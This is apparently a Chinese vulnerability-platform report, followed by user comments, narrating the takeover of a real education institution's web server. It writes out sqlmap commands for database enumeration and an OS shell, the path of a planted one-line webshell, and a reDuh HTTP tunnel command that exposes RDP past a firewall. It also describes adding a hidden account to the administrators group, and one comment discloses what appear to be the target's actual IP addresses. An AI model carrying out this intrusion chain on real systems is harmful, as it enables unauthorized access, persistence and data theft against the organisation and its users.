看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器

网址：http://**.**.**.**

一个sql注入导致的服务器沦陷。

一个事业教育单位，今天就上服务器看看.(声明：未有任何破坏性操作)

没事溜达到这个网址：(注入点)

http://**.**.**.**/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169

首先是暴库（16个数据库吧）：

sqlmap -u "http://**.**.**.**/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --dbs

DBA权限：

管理员：

脱裤暴表就没弄了，要这些数据也没啥用。选择了利用这个渗透进服务器。

下面说重点了。os-shell

sqlmap -u "http://**.**.**.**/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --os-shell

比较奇怪sqlmap里执行os-shell不顺手，有点问题，现在就是写个马进去就行了。

果断换了种方式写了个一句话：

之前报错信息已经暴漏了网站的物理地址，马的物理位置：

d:/mainweb/ParentSchool/CN/jxhd/import.aspx

直接上服务器：

至此，已经拥有了这台服务器的shell了。

上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。

到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。

得到的公网IP信息：

Nmap scan report for **.**.**.**

Host is up (0.011s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 7.0

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

就开了个80端口。

在菜刀里ipconfig下看到的是：

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :

本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10

IPv4 地址 . . . . . . . . . . . . : **.**.**.**

子网掩码 . . . . . . . . . . . . : **.**.**.**

默认网关. . . . . . . . . . . . . : **.**.**.**

原来是这样的：

公网ip地址:**.**.**.** 这个只开了80端口

内网ip地址:**.**.**.**

要么是防火墙，要么做了端口映射，直接访问内网ip地址:**.**.**.**肯定是不行的了。怎么办？

上面的上传的那个getinfo.aspx文件的作用来了。

这里reDuh隧道穿透了：

java -jar reDuhClient.jar http://**.**.**.**/ParentSchool/CN/jxhd/getinfo.aspx

给大家弄个截图，大致会出现下面界面：

打开本地1010端口，使用telnet或者nc连接本地的1010端口：

创建隧道：[createTunnel]1234:**.**.**.**:3389

nc本地1010端口，将本地1234端口与远程的服务器端3389端口绑定

ok，基本工作均已完成。下面在用菜刀添加个用户：

密码就不显示了。

提升权限至administrators组

好了，这就全部完成了：

mstsc打开本地**.**.**.**：1234端口，输入刚添加的用户名密码。直接RDP进内网吧：

这样就想操作你自己的电脑一样了，想干什么就干什么。

如上。

一句话：

http://**.**.**.**/ParentSchool/CN/jxhd/import.aspx

RDP隧道：

http://**.**.**.**/ParentSchool/CN/jxhd/getinfo.aspx

过滤

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-09-29 13:51

厂商回复：

最新状态：

暂无

1. 2014-09-28 10:24 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

   0

   ~给你弄一个禁止链接外网你就逗B了

   1# 回复此人

2. 2014-09-28 10:28 | D_in ( 普通白帽子 | Rank:423 漏洞数:65 | 到我嘴里来)

   0

   标题好高大上

   2# 回复此人

3. 2014-09-28 10:41 | 白 ( 路人 | Rank:12 漏洞数:2 | 关注网络安全，学习网络技术)

   0

   洞主的账号 很有吸引！！

   3# 回复此人

4. 2014-09-28 11:45 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

   0

   @大白菜 你还是没明白？我走的是隧道！除非网站不发布在公网上！

   4# 回复此人

5. 2014-09-28 11:46 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

   0

   @白 ？？？怎么说？

   5# 回复此人

6. 2014-09-29 07:48 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

   0

   @Anonymous.L ...我的意思就是不在公网- -！现在挺流行这么做的

   6# 回复此人

7. 2014-09-29 09:42 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

   0

   @大白菜 本来就不在公网，访问的网站ip是做了映射，不知道你说的流行是什么

   7# 回复此人

8. 2014-09-29 19:06 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

   0

   @Anonymous.L 那你扯啥犊子呢，映射不还是在外网

   8# 回复此人

9. 2014-09-29 20:27 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

   0

   @大白菜 你说了好大一堆废话。按你的意思，那跟不发布网站有什么区别？说了是隧道，外边访问里面只有通过某个ip的80端口到内网服务器的真正应用上。你还是先理清楚吧！

   9# 回复此人

10. 2014-09-30 00:07 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    0

    @Anonymous.L ...说的真高深，，，一个端口转发说的跟啥似的

    10# 回复此人

11. 2014-09-30 01:09 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    0

    @大白菜 不明白你在端口转发什么，传统的反弹？端口复用？还是什么

    11# 回复此人

12. 2014-10-20 10:19 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    0

    这个是基于HTTP隧道的，和一般的端口转发反弹什么的，不一样的啊。

    12# 回复此人

13. 2014-10-20 13:00 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    0

    @wefgod 是的，有了这个隧道防火墙就形同虚设。O(∩_∩)O~

    13# 回复此人

14. 2014-11-08 08:18 | 佩佩 ( 实习白帽子 | Rank:62 漏洞数:8 | 私人QQ:49658 技术交流Q群:511123 大神土...)

    0

    @Anonymous.L. 有前途

    14# 回复此人

15. 2014-11-08 20:57 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    0

    @佩佩 我只是一个菜鸟而已，前途，好迷茫，不知道以后的路会是怎样

    15# 回复此人

16. 2014-11-09 14:24 | 佩佩 ( 实习白帽子 | Rank:62 漏洞数:8 | 私人QQ:49658 技术交流Q群:511123 大神土...)

    1

    @Anonymous.L 你这么低调，你家里人知道吗？

    16# 回复此人

17. 2014-11-09 20:02 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @佩佩 ....其实hack只是兴趣爱好之一，我也很喜欢Code的，有招聘的没，刚入社会的小菜鸟，求拖走ing ╮(╯_╰)╭

    17# 回复此人

18. 2014-11-12 00:24 | GrayTrack ( 实习白帽子 | Rank:88 漏洞数:19 | TXTSEC信息安全团队)

    1

    端口复用吧

    18# 回复此人

19. 2014-11-12 09:34 | 末日 ( 路人 | Rank:5 漏洞数:2 | 每天进步一点点)

    1

    哈哈。。笑尿了。。这明明是特么的内网 还说的那么高大上。。还RDP隧道。。。唉。。大黑阔。。请低调点。。。

    19# 回复此人

20. 2014-11-12 13:31 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @末日 ip分几个段？210.22.116.91和10.11.124.5是同一网段？你把TCP/IP协议第一卷学好再来吧，真是逗了

    20# 回复此人

21. 2014-11-12 13:34 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @GrayTrack 准确的说应该算是HTTP隧道

    21# 回复此人

22. 2014-11-12 15:33 | 末日 ( 路人 | Rank:5 漏洞数:2 | 每天进步一点点)

    1

    @Anonymous.L 你傻么 请上ip138.com查下10.11.124.5 谢谢

    22# 回复此人

23. 2014-11-12 17:06 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @末日 那又怎样了，关键是你telnet 210.22.116.91与10.11.124.5的80端口测试下不就知道了？我不是说了，不是防火墙就是端口映射了？要是你都能telnet上去，那你厉害

    23# 回复此人

24. 2014-11-12 17:38 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    问个问题 得到的公网IP信息： 这部分，nmap是在哪运行的？

    24# 回复此人

25. 2014-11-12 18:07 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @小饼仔 Windows DOS

    25# 回复此人

26. 2014-11-12 18:17 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @Anonymous.L 你在本地运行nmap来获取web sever的ip？ 还有个问题 创建隧道：[createTunnel]1234:127.0.0.1:3389 中间的ip地址，我看了http://research.sensepost.com/tools/web/reduh上面说是用目标服务器的ip，你这怎么用127.0.0.1？

    26# 回复此人

27. 2014-11-12 18:20 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @Anonymous.L 目标服务器指的是内网服务器

    27# 回复此人

28. 2014-11-12 18:20 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @小饼仔 HTTP隧道，这个127.0.0.1:3389 不是本地的3389

    28# 回复此人

29. 2014-11-12 18:23 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @Anonymous.L 恩，3389指内网服务器的，但是这个ip地址为什么是127.0.0.1啊？

    29# 回复此人

30. 2014-11-12 18:29 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @Anonymous.L web项目和数据库都在同一个服务器上，所以是127.0.0.1？

    30# 回复此人

31. 2014-11-12 19:47 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @小饼仔 跟WebApp和DB没啥联系，这些主要是基于getinfo那个文件执行的，本地1234---getinfo---3389，也就是HTTP与RDP之间的转换

    31# 回复此人

32. 2014-11-12 19:50 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @Anonymous.L 私信求联系方式，私聊

    32# 回复此人

33. 2014-11-12 19:51 | loopx9 ( 普通白帽子 | Rank:827 漏洞数:84 | ..)

    1

    @Anonymous.L 你这图搞错了吧？ aspx应该是iis吧，添加用户怎么又跑到xampp去了。

    33# 回复此人

34. 2014-11-12 19:55 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @loopx9 你果然细心，是的，那是另一个站的，只不过乌云上没有发布。只是搞了个大致截图，够心细的！

    34# 回复此人

35. 2014-11-12 19:57 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    1

    @Anonymous.L 的确是由getinfo来执行的，但是你得告诉getinfo与那个ip的3389端口建立连接，127.0.0.1，也就是本机，即你提到的只有内网IP的服务器

    35# 回复此人

36. 2014-11-12 20:01 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    1

    @小饼仔 3389端口就是传了getinfo那个文件的服务器3389，说白了就是他只开发了80端口，你没办法RDP连上去，所以你通过HTTP的80端口做了转换，变相打开了3389，其实还是80

    36# 回复此人